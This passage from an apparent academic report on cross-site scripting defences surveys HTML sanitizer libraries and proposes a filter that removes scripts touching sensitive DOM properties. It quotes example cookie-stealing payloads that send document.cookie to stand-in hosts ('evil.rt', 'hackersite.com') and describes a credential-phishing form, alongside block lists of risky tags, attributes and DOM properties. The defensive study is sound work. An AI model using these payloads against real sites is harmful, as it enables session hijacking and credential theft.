In the case of an XSS flaw, an attacker exploits a lack of input and/or output filtering. Filtering out dangerous characters such as <, >, ", ', &, ;, or # in an application could resolve the XSS flaw. XSS is related to the application performing insufficient data validation. XSS flaws may allow any CSRF protection to be bypassed by leaking valid token values, by making Referer headers appear to come from the application itself, or by hosting hostile HTML and JavaScript elements right in the target application. Resolving XSS flaws should therefore be given priority over CSRF weaknesses [CSRF].
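As a minimal sketch of output filtering, the Python fragment below encodes the characters that are significant in HTML instead of deleting them. Note that this swaps filtering for encoding; it uses the standard html.escape function, and the helper name encode_for_html is hypothetical. It only covers text placed in an HTML body or a quoted attribute value, so other output contexts would need different handling.

```python
import html


def encode_for_html(untrusted):
    """Encode &, <, >, double and single quotes before the text is written into a page."""
    return html.escape(untrusted, quote=True)


comment = '<script>alert("XSS")</script>'
safe = encode_for_html(comment)
print(safe)
```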

XSS aims at inserting active code into an HTML document, either to abuse client-side active scripting holes or to send privileged information (e.g. authentication/session cookies) to an attacker-controlled site. CSRF does not rely on client-side active scripting in any way; its aim is to take unwanted, unapproved actions on a site where the victim has some prior relationship and authority.

Where XSS seeks to steal the online trading cookies so that an attacker can manipulate the

victim’s portfolio, CSRF seeks to use the victim’s cookies to force the victim to execute a trade

without his knowledge or consent.

CHAPTER 3

EXISTING XSS DEFENSES

There is a dire need for web applications to provide users with the ability to format their

profile or postings using Hypertext Markup Language / Cascading Style Sheet (HTML/CSS). To

attain that functionality, developers must allow users to provide their own source code directly or

give the user an intermediate language with which the user can work.

As simple solutions, many lightweight markup languages other than HTML are available, such as BBCode [BBC], Wikitext [WIT], Markdown [MAD], Textile [TEX] and WYSIWYG; these are parsed by the message board system before being translated into a markup language that web browsers understand (HTML or XHTML).

An example of intermediate language code for rendering green text is shown below.

[color=green]Sample Text[/color]

After translation the above code would be rendered to the user’s browser in the target

language, HTML/CSS as seen below

<span style="color: green">Sample Text</span>

This is a safe approach in general because it does not allow users to specify arbitrary

target language code which can be obfuscated and disguised using various encoding and

fragmenting techniques. By providing an intermediate language and interpreting it in a top-down fashion, the application renders only the subset of HTML functionality that it wishes to interpret.
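The translation of an intermediate language can be sketched as follows. This is a minimal illustration under stated assumptions, not the parser of any particular message board: only a single [color=...] tag is supported, the set of permitted colour names and the function name render_bbcode are hypothetical, and all user text is HTML-escaped before any tag is translated.

```python
import html
import re

# Hypothetical allow-list of colour names; any other value is left untranslated.
ALLOWED_COLORS = {"green", "red", "blue", "black"}

COLOR_TAG = re.compile(r"\[color=([a-z]+)\](.*?)\[/color\]", re.IGNORECASE | re.DOTALL)


def render_bbcode(text):
    """Translate [color=...] tags into HTML after escaping all user-supplied text."""
    escaped = html.escape(text, quote=True)

    def replace(match):
        color = match.group(1).lower()
        if color not in ALLOWED_COLORS:
            return match.group(0)  # unknown colour: keep the escaped text unchanged
        return '<span style="color: {}">{}</span>'.format(color, match.group(2))

    return COLOR_TAG.sub(replace, escaped)


print(render_bbcode("[color=green]Sample Text[/color]"))
```

Because the application emits only the markup it generates itself, user-supplied angle brackets never reach the browser as tags.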

There is a practical problem with this approach. The user will be fairly limited in formatting, because the limited instruction set provided by the web application is unlikely ever to be as complete as the HTML/CSS specifications. Moreover, although the attributes and attribute values offered by these markup languages are not themselves vulnerable, the languages still face problems in the way they translate the intermediate markup into secure HTML/XHTML (i.e., the translated HTML is not guaranteed to be secure).

The other option when providing formatting capability is to allow users to input HTML/CSS directly. If the user’s input cannot be trusted, it is imperative that the application be able to detect and remove any malicious code. Several solutions have been developed for this purpose; this chapter examines them one by one.

3.1 AntiSamy

The primary focus of the developers of AntiSamy [ANT] (named in reference to Samy Kamkar’s now infamous MySpace XSS worm) was to create an XSS filter that works on a positive and customizable security model. The secondary focus was to make the tool as user friendly as possible, so that applications using it can communicate to users how their input was filtered or how they could tune it themselves to pass the filter successfully.

AntiSamy first sanitizes the user-supplied input using NekoHTML, to avoid false positives caused by unbalanced start or end markers. NekoHTML is a standalone Java API that transforms broken HTML of any version into clean XHTML 1.0.

The main validation processing takes place in a depth-first fashion. Starting with the root,

each node is processed according to the specifications inside the security model XML file given

with the node name (e.g., html or input). There are three modes of validation (also called

processing actions): filter, truncate and validate; each is described below.

Filter

The filter processing action performs no validation per se, but only removes the start and

end tags, promoting the tag’s contents. This sanitization is useful in many cases. For example, if

you decided you wouldn’t like users to input meta tags that could mess with your robot indexing,

setting filter would have the effect demonstrated below.

User Input: This is some text.

Output after Filtering: This is some text.

Truncate

When the truncate processing action is set, no actual validation takes place. The truncate

action simply removes all the attributes and child nodes of a tag, making validation of its

attributes unnecessary. A number of tags should be set to truncate.

User Input:
Output after Truncating:

Many formatting tags are set to truncate in the default policy file, including em, small,

big, i, b, u, center, pre and more.
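The filter and truncate actions can be sketched on a small DOM tree. The fragment below is only an illustration in Python, not AntiSamy's Java code: it assumes the input is already well-formed XHTML (as it would be after the NekoHTML step), it uses the standard xml.etree.ElementTree module, the function names are hypothetical, and it assumes that truncation keeps the text of a tag while dropping its attributes and child elements.

```python
import xml.etree.ElementTree as ET


def _append_text(parent, index, text):
    """Attach text immediately before position `index` among the children of parent."""
    if not text:
        return
    if index == 0:
        parent.text = (parent.text or "") + text
    else:
        previous = parent[index - 1]
        previous.tail = (previous.tail or "") + text


def filter_tag(parent, child):
    """Filter action: drop the start and end tags of child, promoting its contents."""
    index = list(parent).index(child)
    grandchildren = list(child)
    parent.remove(child)
    _append_text(parent, index, child.text)
    for offset, grandchild in enumerate(grandchildren):
        parent.insert(index + offset, grandchild)
    _append_text(parent, index + len(grandchildren), child.tail)


def truncate_tag(elem):
    """Truncate action: drop attributes and child elements (text is kept by assumption)."""
    text = "".join(elem.itertext())
    tail = elem.tail
    elem.clear()  # removes attributes, children, text and tail
    elem.text = text
    elem.tail = tail


root = ET.fromstring('<div><meta name="robots">This is <i>some</i> text.</meta> End</div>')
filter_tag(root, root[0])
print(ET.tostring(root, encoding="unicode"))

bold = ET.fromstring('<b onclick="x()">bold <i>and italic</i></b>')
truncate_tag(bold)
print(ET.tostring(bold, encoding="unicode"))
```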

Validate

The validate processing action is where the meat of the filtering logic resides. If there are

no attributes defined for a tag by the policy file, the validate processing action will act the same

as the truncate processing action, except the child nodes will be validated instead of removed.

The validate action steps through each of the attributes in the tag to be filtered and checks

if there is a corresponding entry for that tag and attribute combination in the policy file. If no

entry is found, the attribute is simply removed. If there is an entry, the filter tries to validate its

value against the rules in the entry.

There are two ways for an attribute value to be validated: by being equal to a literal string

value or by the matching of a regular expression. Accordingly, each attribute’s definition in the

policy can have a list of valid literal strings and a list of regular expressions to match. This is a

departure from other XSS filters (and other security tools, in general) that don’t allow for

multiple ways to specify valid values, which force the user into writing overly complex (and

likely incomplete or unpredictable) regular expressions.
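The two validation routes, literal values and regular expressions, can be sketched as below. The policy entries are hypothetical and written as a Python dictionary for brevity; they are not taken from the AntiSamy policy file, and the function name is_valid is an assumption.

```python
import re

# Hypothetical policy: each attribute has a list of literals and a list of regular expressions.
POLICY = {
    "align": {"literals": ["left", "right", "center"], "regexps": []},
    "href": {"literals": [], "regexps": [r"https?://[\w.-]+(/[\w./?=&%-]*)?"]},
}


def is_valid(attr, value):
    """Return True if the value equals a permitted literal or fully matches a permitted pattern."""
    entry = POLICY.get(attr)
    if entry is None:
        return False  # no entry in the policy: the attribute would simply be removed
    if value.lower() in entry["literals"]:
        return True
    return any(re.fullmatch(pattern, value) for pattern in entry["regexps"])


print(is_valid("align", "center"))
print(is_valid("href", "javascript:alert(1)"))
```

Keeping short literal lists next to the patterns avoids encoding every permitted value in one large expression.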

When an attribute does not pass a validation check, one of a few onInvalid actions is

taken. The possible onInvalid actions dictate what to do with the tag and its contents. The set of

onInvalid actions includes removeTag, filterTag and removeAttribute. The default action is

removeAttribute.

If an attribute with the removeTag set for its onInvalid action fails validation, the tag

holding the attribute being checked and its contents will be removed entirely. This onInvalid

action is reserved for those attributes, which when removed, make the presence of the tag

meaningless. An example usage of this setting is displayed below.

Welcome, my name is var cke = document.cookie; var url= ‘http://evil.rt/cookie.cgi’+cke; document.location = url; and I’m 25 years old!

The message above was posted by a user. The result after this code fails validation is shown below.

Welcome, my name is and I’m 25 years old!

If an attribute with an onInvalid action set to filterTag fails validation, the start and end

tag of the node will be removed while the contents are promoted. This is exactly what happens in

the filter processing action. The process can be seen below.

Click on this!

The message above was posted by a user. The result after passing this message to AntiSamy will be:

Click on this!

The default onInvalid action is removeAttribute. When this onInvalid action is set (or if

none is set) on an attribute that fails validation, the attribute itself is removed from the tag, but

the tag and its contents will remain. The process is shown below.

The message above was posted by a user. The result after passing this message to AntiSamy will be:

The knowledge base for the filter’s engine is an XML file called antisamy.xml. The same

policy file can be used across multiple implementations (.Net, J2EE, etc.). The default policy file

was tailored to W3C’s HTML 4.0 and CSS 2.0 specifications. Thus any official attribute that

is dictated by the specifications can be used. If a user agent supports an attribute not specified, it

can be added to the policy file, though some effort has already been put in integrating those non-

standard attributes which are being used and honored in the wild.

To summarize, OWASP AntiSamy is an API implemented in Java and .NET to ensure that user-supplied HTML/CSS complies with an application's rules. It has very good XSS cleaning abilities, so long as it removes anything it does not recognize. Architecturally, OWASP AntiSamy is highly dependent on policy files, which are a highly extended form of XML Schema with information on which attributes and elements to allow. As such, the actual filtering code is relatively lightweight. Unfortunately, while XML Schema files give a high level of control over validation, the regular-expression-heavy approach begins to show signs of stress when data types are complex (e.g. URIs).

3.2 The strip_tags()

The PHP function strip_tags() [STT] is the classic solution for attempting to clean unwanted tags out of HTML. It is the worst solution of all for avoiding XSS, because it does not validate attributes at all: anyone can insert a malicious script in an attribute such as onmouseover='xss();' and exploit the application. While this can be band-aided with a series of regular expressions that strip out on[event] attributes, strip_tags() is fundamentally flawed and should not be used. An example of using strip_tags() is illustrated below:

<?php
echo strip_tags($text, '<p><a>'); // Allow <p> and <a>
?>

In the above example, strip_tags() strips all tags except the <p> and <a> tags. In this way malicious tags can be stripped out, but the values of attributes cannot be validated. To validate the attributes of tags, extra code can be written on the server side, but such a solution is neither efficient nor effective.
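The weakness of tag-only stripping can be demonstrated with a rough Python analogue. This is not PHP's implementation of strip_tags(); the function strip_tags_like and its regular expression are assumptions made for illustration. It removes every tag whose name is not allowed and never inspects attributes.

```python
import re

# Matches an opening or closing tag and captures the tag name.
TAG = re.compile(r"</?([a-zA-Z][a-zA-Z0-9]*)\b[^>]*>")


def strip_tags_like(text, allowed=()):
    """Remove tags whose names are not in `allowed`; attributes are left untouched."""
    def keep_or_drop(match):
        return match.group(0) if match.group(1).lower() in allowed else ""
    return TAG.sub(keep_or_drop, text)


message = "<p onmouseover='xss();'>Hi <script>evil()</script></p>"
result = strip_tags_like(message, allowed=("p", "a"))
print(result)
```

The script tags are removed, but the event handler on the permitted tag passes through unchanged, which is exactly the gap described above.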

3.3 PHP Input Filter

PHP Input Filter [PIF] is an upgraded version of strip_tags() with the ability to inspect attributes. It implements an HTML parser and performs very basic checks on whether tags and attributes have been defined in the whitelist (what to permit is left up to the user). Since it does not check well-formedness at all, it is trivially easy to trick the filter into leaving unclosed tags. Any user who allows the style attribute will be in great trouble, as CSS cannot simply be let through without the layout being badly mutilated.

3.4 HTML_Safe/SafeHTML

HTML_Safe/SafeHTML [HTS] works by parsing HTML with a SAX parser and performing validation and filtering as the handlers are called. Whereas strip_tags() can only strip tags, HTML_Safe strips all active content, including tags, attributes and attribute values. This parser strips all potentially dangerous content within HTML:

opening tag without its closing tag

closing tag without its opening tag

any of these tags: "base", "basefont", "head", "html", "body", "applet", "object",

"iframe", "frame", "frameset", "script", "layer", "ilayer", "embed", "bgsound", "link", "meta",

"style", "title", "blink", "xml" etc.

any of these attributes: on*, data*, dynsrc

javascript:/vbscript:/about: etc. protocols

expression/behavior etc. in styles

any other active content
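The blacklist above can be expressed as a pair of simple checks. The sketch below is a Python illustration and not the code of HTML_Safe: the function names are hypothetical, the tag and protocol lists are copied from the list above (without its "etc." entries), and whitespace is removed from values before comparison as a simplifying assumption.

```python
import re

DANGEROUS_TAGS = {
    "base", "basefont", "head", "html", "body", "applet", "object", "iframe",
    "frame", "frameset", "script", "layer", "ilayer", "embed", "bgsound",
    "link", "meta", "style", "title", "blink", "xml",
}
DANGEROUS_PROTOCOLS = ("javascript:", "vbscript:", "about:")


def is_dangerous_tag(tag):
    """Return True for tags on the blacklist."""
    return tag.lower() in DANGEROUS_TAGS


def is_dangerous_attribute(name, value=""):
    """Return True for on*, data* and dynsrc attributes, script protocols and active CSS."""
    name = name.lower()
    if name.startswith(("on", "data")) or name == "dynsrc":
        return True
    compact = re.sub(r"\s+", "", value).lower()
    if compact.startswith(DANGEROUS_PROTOCOLS):
        return True
    if name == "style" and ("expression" in compact or "behavior" in compact):
        return True
    return False


print(is_dangerous_tag("iframe"), is_dangerous_attribute("href", "javascript:alert(1)"))
```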

It also tries to convert code to valid XHTML, but htmltidy is a far better solution for this task. HTML_Safe does a lot of things right, such as blacklisting dangerous attributes. However, blacklisting whole tags (like style, applet, etc.) because they have some dangerous attributes results in a loss of functionality. In addition, it blocks all occurrences of XSS by stripping them off.

3.5 Kses

Kses [KSS] is an HTML/XHTML filter written in PHP. It removes all unwanted HTML elements and attributes, and it also performs several checks on attribute values (to avoid buffer overflow attacks). Kses can be used to avoid XSS, as it allows only the HTML elements and attributes that it was explicitly told to allow. It also removes additional "<" and ">" characters that people may try to sneak in somewhere. The set of APIs that Kses offers its users is shown below with explanations.

Table 3.1: Kses APIs

API | Functionality
Parse($string = "") | The basic function of kses. Give it a $string, and it will strip out the unwanted HTML and attributes.
AddProtocols() | Add a protocol or list of protocols to the kses object to be considered valid during a Parse(). The parameter can be a string containing a single protocol, or an array of strings, each containing a single protocol.
Protocols() | Deprecated. Use AddProtocols().
AddProtocol($protocol = "") | Adds a single protocol to the kses object that will be considered valid during a Parse().
SetProtocols() | This is a straight setting/overwrite of existing protocols in the kses object. All existing protocols are removed, and the parameter is used to determine what protocol(s) the kses object will consider valid. The parameter can be a string containing a single protocol, or an array of strings, each containing a single protocol.
DumpProtocols() | This returns an indexed array of the valid protocols contained in the kses object.
DumpElements() | This returns an associative array of the valid (X)HTML elements in the kses object along with attributes for each element, and tests that will be performed on each attribute.
AddHTML($tag = "", $attribs = array()) | This allows the end user to add a single (X)HTML element to the kses object along with the (if any) attributes that the specific (X)HTML element is allowed to have.
RemoveProtocol($protocol = "") | This allows for the removal of a single protocol from the list of valid protocols in the kses object.
RemoveProtocols() | This allows for the single or batch removal of protocols from the kses object. The parameter is either a string containing a protocol to be removed, or an array of strings that each contain a protocol.
filterKsesTextHook($string) | For the OOP (Object Oriented Programming) version of kses, this is an additional hook that allows the end user to perform additional postprocessing of a string that's being run through Parse().
_hook() | Deprecated. Use filterKsesTextHook().

Configuring and using the Kses APIs is simple and flexible: the user can set the protocols to allow or disallow, and can configure the API to add elements or attributes to, or remove them from, the preconfigured Kses. Users need to be very cautious in using the APIs, as different ways of using them result in different functionality. Kses is nevertheless not a very good option, as it has many loopholes that have been publicly exposed by its users [GEL].
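The protocol handling described in Table 3.1 can be pictured with a small stand-in class. The sketch below is written in Python and is not the PHP kses class: the class ProtocolList and its method names are hypothetical and only loosely mirror the API names in the table, and the assumption that relative URLs (with no scheme) are permitted is introduced here for illustration.

```python
from urllib.parse import urlsplit


class ProtocolList:
    """Hypothetical allow-list of URL protocols, loosely modelled on Table 3.1."""

    def __init__(self, protocols=("http", "https")):
        self._protocols = [p.lower() for p in protocols]

    def add_protocols(self, protocols):
        # Accept a single protocol string or a list of protocol strings.
        if isinstance(protocols, str):
            protocols = [protocols]
        for protocol in protocols:
            protocol = protocol.lower().rstrip(":")
            if protocol not in self._protocols:
                self._protocols.append(protocol)

    def remove_protocol(self, protocol):
        protocol = protocol.lower().rstrip(":")
        if protocol in self._protocols:
            self._protocols.remove(protocol)

    def set_protocols(self, protocols):
        # Overwrite: all existing protocols are discarded first.
        self._protocols = []
        self.add_protocols(protocols)

    def dump_protocols(self):
        return list(self._protocols)

    def allows(self, url):
        scheme = urlsplit(url.strip()).scheme.lower()
        return scheme == "" or scheme in self._protocols


protocols = ProtocolList()
protocols.add_protocols(["ftp", "mailto"])
print(protocols.dump_protocols(), protocols.allows("javascript:alert(1)"))
```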

3.6 htmLawed

In the words of its developers, the highly customizable htmLawed [HTM, HTL] filter can be used to make text with HTML more secure and policy-compliant. It can auto-correct and beautify HTML markup and restrict HTML elements (tags), attributes, and URL protocols in the input. It also balances tags and checks for proper nesting of HTML elements. Furthermore, it can transform deprecated tags and attributes, check and convert character entities (e.g., from hexadecimal to decimal type), obfuscate email addresses as an anti-spam measure, etc. The set of features that htmLawed provides is quite appreciable. However, it simply strips off all occurrences of script; it fails to validate scripts and to differentiate a simple script from XSS.

On the other hand, according to [HTP], htmLawed is a modified version of Kses (with some features added). It just strips off the script tag in order to avoid execution of script, and its validation of attribute values is weak (it allows inclusion of cgi/javascript/html files, which may lead to XSS).

3.7 Safe HTML Checker

Safe HTML Checker [SHC] is of the same flavor as the others, but it is a well-written piece of code (strict in checking and parsing tags). It is a whitelisting filter that removes every tag not found in its filter list. It is very strict in filtering all occurrences of script and CSS (Cascading Style Sheets). Safe HTML Checker was developed to satisfy the requirements shown below.

1. Entered markup should be valid XHTML Strict, to stop comments from breaking validation and keep things nice and tidy.

2. No presentational markup! They wanted web administrator to have complete control over

style sheets and comments posted should only be able to use structural HTML elements.

3. Attributes should be restricted to those that add semantic meaning. Javascript event

attributes and CSS related attributes should not be allowed.

4. Web Administrator should retain full control over the tags and attributes allowed in the

comments.

5. Submitted HTML must be kept free from anything that could pose a security risk, such as

javascript: URLs.

In satisfying these requirements, the developer of Safe HTML Checker was not much concerned about the loss of functionality caused by his solution.

3.8 HTML Purifier

HTML Purifier [HTP] is a standards-compliant HTML filter library written in PHP. The developers of HTML Purifier claim that it removes all scripting code by auditing it thoroughly, which results in a loss of functionality. In this respect it is no different from the other existing solutions: it strips off all occurrences of script.

3.9 Summary

Regarding the available API/tool support, the present situation is not at all encouraging. Even the combination of all these approaches is not promising for web application security; hardly any tool supports the proper approach. The absence of a holistic approach to correctly identifying XSS attacks is a genuine matter of concern for web application security.

CHAPTER 4

PROBLEM STATEMENT

A simple script inserted in a message is very often mistaken for an XSS attack. Scripting is a functionality provided for a better user experience. In existing solutions, any inserted script is assumed to be malicious and is stripped. For example, alert("XSS") is not malicious because it does not harm the user. In contrast, alert(document.cookie) is malicious because it tries to access a browser DOM object (which is supposed to be secure); this may lead to hijacking of the user session. In security terms, an attack is something that harms a legitimate user. Hence we claim that merely inserting a script does not constitute an XSS attack.
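The distinction drawn above can be illustrated with a deliberately naive check. The sketch below is an assumption-laden Python illustration, not the API developed in this project: the function looks_malicious and its pattern list are hypothetical, document.location is included only as an illustrative second entry, and plain pattern matching of this kind is easily evaded (for example by writing document["cookie"]).

```python
import re

# Hypothetical, deliberately small list of sensitive DOM references.
SENSITIVE_REFERENCES = [
    r"document\s*\.\s*cookie",
    r"document\s*\.\s*location",
]
SENSITIVE = re.compile("|".join(SENSITIVE_REFERENCES), re.IGNORECASE)


def looks_malicious(script):
    """Return True if the script text refers to a sensitive DOM property."""
    return SENSITIVE.search(script) is not None


print(looks_malicious('alert("XSS")'))
print(looks_malicious("alert(document.cookie)"))
```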

Having understood XSS attacks, another challenge that we identified in safeguarding users from them is whether to go with a server-side or a client-side solution. A client-side solution can help users who are security conscious, who are familiar with XSS attacks and who have some technical expertise (to use the solution we provide); such a solution may not help novice users.

This project aims at developing a holistic server-side XSS API which differentiates an XSS attack from a simple script and strips the attack off. Novice users can thus enjoy a safe and better browsing experience without any loss of functionality and without the need for additional software or configuration on the browser side. Developing such an API also reduces the burden on web administrators of safeguarding their web applications from malicious XSS attacks.

CHAPTER 5

DIFFERENTIATING XSS FROM SIMPLE SCRIPTS

An analysis of the available and widely used solutions for XSS is presented in Chapter 3. What the existing solutions miss, and the new problems this gives rise to, are discussed in Chapter 4. This chapter develops a solution to the problem identified.

It is well known that XSS occurs because of malicious script inserted by an attacker into a web application. Before determining what makes a script malicious, we should therefore determine where an attacker can insert script in the web application. None of the tags or attributes of the markup languages was designed for malicious purposes. They are meant for genuine use, but attackers use these tags and attributes for their own gain (fame or theft). From our observation, we compiled a list of tags and attributes that give an attacker scope to insert malicious script; it is shown in Table 5.1:

Table 5.1: Tags and their attributes which are in favour of attackers

Tag | Attribute
form | action
body | background
applet | code
object | data
a, area, link | href
iframe, frame, img | longdesc
img | onabort
a, area, button, input, label, select, textarea | onblur
input, select, textarea | onchange
a, abbr, acronym, address, area, tt, i, b, small, big, body, button, caption, center, em, strong, dfn, code, samp, kbd, var, cite, col, colgroup, dd, del, dir, div, dl, dt, fieldset, form, h1 - h6, input, ins, label, legend, li, link, map, menu, noframes, noscript, ol, hr, img, optgroup, option, p, pre, q, s, strike, select, span, sub, sup, table, tbody, td, textarea, tfoot, th, thead, tr, u, ul | onclick, ondblclick, onkeydown, onkeypress, onkeyup, onmousedown, onmousemove, onmouseout, onmouseover, onmouseup
body, frameset | onload
a, area, button, input, label, select, textarea | onfocus
form | onreset
input, textarea | onselect
form | onsubmit
body, frameset | onunload
frame, iframe, img, input, script | src
a, abbr, acronym, address, applet, area, tt, i, b, small, big, basefont, bdo, blockquote, body, br, button, caption, center, em, strong, dfn, code, samp, kbd, var, cite, col, colgroup, dd, del, dir, div, dl, dt, fieldset, font, form, frame, frameset, h1 - h6, hr, iframe, img, input, ins, label, legend, li, link, map, menu, noframes, noscript, object, ol, optgroup, option, p, pre, q, s, strike, select, span, sub, sup, table, tbody, td, textarea, tfoot, th, thead, tr, u, ul | style

Having understood that the above tags and attributes give an attacker scope to insert malicious script, it is necessary to know how an attacker can use them. The attributes found vulnerable can be categorized into three types:

1. Attributes that bring in content from outside the actual page, such as href, src, etc., through which a page/object with malicious content can be included in the existing page.

2. Attributes that allow the user to write script directly, such as onload, onmouseover, onclick, etc., through which malicious script can be included.

3. Attributes that allow the user to style his content.

How these three categories differ can be understood better with examples. The first type is the set of attributes which include an external object or content in the current page. To illustrate how these attributes can be malicious, take the <input> tag of image type. For an <input> tag of image type, external image content is supplied through the src attribute, and the image is displayed in the existing page. An attacker, however, will insert malicious script instead of the location of an image. One such example is shown below; it raises an alert containing the session cookie every time the page is loaded. Raising an alert is not in itself malicious, but since the alert exposes the user's session cookie, which is supposed to be secure, the script is considered malicious.

The set of attributes that belong to this category are: action, background, classid, code,

data, href, longdesc, src.

Attributes of this type should be restricted in the external content they may reference, based on the tag and the attribute. The allowed set of extensions for each tag and attribute is shown below:

Table 5.2: Extensions allowed

Tag | Attribute | Allowed Extensions
img, input (type=image) | src, lowsrc, dynsrc | .jpg, .jpeg, .png, .xbm, .gif, .bmp
a, area, link | href | .htm, .html, .asp, .jsp, .php, .aspx, .swf, .rb, .pl, .cgi
frame, iframe | src | .jpg, .jpeg, .png, .xbm, .gif, .bmp, .htm, .html, .asp, .jsp, .php, .aspx
Any Tag | longdesc | .txt, .rtf, .doc
embed | src | .pdf, .doc, .wav
Any Tag | background | .jpg, .jpeg, .png, .xbm, .gif, .bmp
script | src | This attribute is not allowed
bgsound | src | .wav, .mid, .au
applet | code | .class
object | classid | .class, .py, .rb
object | data | .jpg, .jpeg, .png, .xbm, .gif, .bmp, .htm, .html, .asp, .jsp, .php, .aspx, .flv, .mov, .wmv, .rm, .ra, .ram
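A check against Table 5.2 could look roughly like the Python sketch below. It is an illustration under stated assumptions rather than the API of this project: only a few rows of the table are encoded, the names ALLOWED_EXTENSIONS and extension_allowed are hypothetical, and the extension is read from the path component of the URL using the standard urllib.parse and posixpath modules.

```python
import posixpath
from urllib.parse import urlsplit

IMAGE_EXTENSIONS = {".jpg", ".jpeg", ".png", ".xbm", ".gif", ".bmp"}

# A few rows of Table 5.2, keyed by (tag, attribute).
ALLOWED_EXTENSIONS = {
    ("img", "src"): IMAGE_EXTENSIONS,
    ("a", "href"): {".htm", ".html", ".asp", ".jsp", ".php", ".aspx", ".swf", ".rb", ".pl", ".cgi"},
    ("applet", "code"): {".class"},
    ("script", "src"): set(),  # this attribute is not allowed at all
}


def extension_allowed(tag, attr, url):
    """Return True if the URL path ends in an extension permitted for this tag and attribute."""
    allowed = ALLOWED_EXTENSIONS.get((tag.lower(), attr.lower()))
    if not allowed:
        return False
    path = urlsplit(url.strip()).path
    extension = posixpath.splitext(path)[1].lower()
    return extension in allowed


print(extension_allowed("img", "src", "http://example.com/pic.PNG"))
print(extension_allowed("img", "src", "javascript:alert(document.cookie)"))
```

An extension check of this kind would presumably be combined with a check of the URL scheme, since the extension alone says nothing about the protocol used.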

The second type is the set of attributes which allow users to insert script directly. Allowing a user to insert script directly is like leaving a bank open 24 hours a day, which makes it easy for a thief to rob it. But just as banks keep their security systems alert to protect their customers' wealth from thieves, the web administrator should have a security system in place to safeguard novice users. To show how attributes of this type can be malicious, an example is illustrated below; it opens a new window every time the page is loaded and posts the novice user's session cookie to the attacker's site, through which session hijacking can be carried out.

The set of attributes that belong to this category are: onblur, onclick, ondblclick, onfocus, onmousedown, onmousemove, onmouseout, onmouseover, onmouseup, onkeydown, onkeypress, onkeyup, onload, onunload, onabort, onchange, onreset, onselect, onsubmit.

The third and last kind of attribute set allows the user to set the style of his content. The examples given for the Type 1 and Type 2 categories are modified here to illustrate how the third set of attributes can be exploited.

The only attribute that belongs to this category is style.

To protect novice users from XSS, we should also consider four tags apart from the attributes listed above, namely the <script>, <base>, <style> and <form> tags. The <script> tag is used by an attacker to insert malicious script directly. The <base> tag is generally used to define the base path for content referenced in the page; an attacker can use it to change the reference path or redirect it to his own site. The <style> tag can be used to insert malicious script in the same way as the style attribute. Such an example is shown below:

background-image: url(window.open(

http://hackersite.com/info.pl?captcha=document.cookie

In the above example, a malicious script is given instead of the background image URL; on execution it opens a new window and sends the user's session cookie to the hacker's site.

To protect users from the XSS-based phishing attack explained in Section 2.6.3, we should also consider the inner text and the action attribute of the <form> tag. How the inner text of a <form> tag can be used by an attacker is illustrated below:

User Name:
Password:

The example shown above creates an HTML form that displays two text boxes asking for a username and password and, on submit, posts the content to the hacker’s site. If an attacker posts this message in the user forum of a banking website, an unsuspecting user who visits the page may log in through the fake form, which can result in a huge loss for that user. Since the inner text of the form tag has such a serious impact, it is always better to strip any content inside the form tag. Apart from the inner text of the form tag, the ‘action’ attribute can also be used by an attacker to steal the user’s username and password. An attacker can post a message containing a form tag and some malicious script that replaces the actual form tag of the page with the inserted one. Such a post obviously causes huge losses to unsuspecting users. Hence the ‘action’ attribute of the form tag should also be removed from user-posted messages.
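
The two rules for the form tag (strip its inner content and drop its action attribute) can be sketched as below. This is a hedged Python illustration built on the standard `html.parser` module rather than the Simple HTML DOM Parser used by SecureXSS; the names `FormStripper` and `strip_forms` are hypothetical, and comments and doctype declarations are simply dropped by this sketch.

```python
from html import escape
from html.parser import HTMLParser

VOID_TAGS = {"br", "hr", "img", "input", "link", "meta"}  # tags with no end tag
RAW_TEXT_TAGS = {"script", "style"}                       # content is not escaped


class FormStripper(HTMLParser):
    """Rebuilds the message, emptying every form and dropping its action."""

    def __init__(self):
        super().__init__()
        self.out = []
        self.in_form = False
        self.raw_text = False

    def handle_starttag(self, tag, attrs):
        if self.in_form:
            return  # anything nested inside a form is stripped
        if tag == "form":
            attrs = [(name, value) for name, value in attrs if name != "action"]
            self.in_form = True
        self.raw_text = tag in RAW_TEXT_TAGS
        rendered = [tag] + [
            name if value is None else f'{name}="{escape(value)}"'
            for name, value in attrs
        ]
        self.out.append("<" + " ".join(rendered) + ">")

    def handle_endtag(self, tag):
        self.raw_text = False
        if tag == "form":
            self.in_form = False
        elif self.in_form or tag in VOID_TAGS:
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.in_form:
            # Text was entity-decoded by the parser, so re-escape it on output.
            self.out.append(data if self.raw_text else escape(data, quote=False))


def strip_forms(message):
    parser = FormStripper()
    parser.feed(message)
    parser.close()
    return "".join(parser.out)


post = ('<p>Please log in</p><form action="http://hackersite.com/steal" '
        'method="post">User Name: <input name="u"> '
        'Password: <input name="p"></form>')
print(strip_forms(post))
```

The empty form element is kept rather than deleted so that the surrounding markup stays balanced; without inner fields or an action it can no longer collect or post credentials.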

The tags and attributes above allow an attacker to insert scripts into a web application, but not every inserted script is XSS. The next step is therefore to find out what sort of scripts make XSS possible.

A script is an attack when it causes harm. In the case of web applications, the harm to users can be session hijacking, denial of service, phishing or alteration of the page content. By stealing a user’s session cookies, an attacker can hijack a legitimate user session. Denial of service can be achieved in many ways, for example by changing the page location so that the user cannot reach the page he wanted to visit, or by throwing alerts in an infinite loop. Phishing can be done by creating or editing forms on the web page.

With the problem narrowed down to these possibilities, it is no longer difficult to find out what sort of scripts cause such issues for a novice user. Our work on identifying malicious scripts resulted in restricting access to a set of DOM properties. Table 5.3 shows some DOM properties that no attacker should be allowed to access, in order to protect the legitimate user.

Table 5.3: DOM properties which can be used for XSS attacks

| DOM Property | Reason |
|---|---|
| document.cookie | Used to steal the user’s session. |
| document.location, location.href, location.replace, location.reload, window.location, window.location.reload(), window.top.location, location.assign, window.self.location, document.reload | Used to change the document location and mount a denial of service attack. |
| window.history, history.forward, history.go, history.back | Used to access the history of the browser window and keep showing pages from history, so that the user cannot reach the page he wants to visit. |
| document.write, document.writeln | Used by an attacker to edit the page content. |
| document.title | Used to change the title of the page. |
| window.status, window.defaultStatus | Used to change the status text of the page and create panic for the legitimate user. |
| document.getElementById, document.getElementsByName, document.getElementsByTagName | Used to set the values of tag attributes in the page. |
| document.anchors, document.forms, document.frames, document.images, document.links, window.frames | Used to set values on the corresponding tags in the page. |

To protect legitimate users from an attacker, we should find every occurrence of any of the properties shown above and strip it, not only in the attributes shown in Table 5.1 but also in the inner text of the script tag and the style tag.

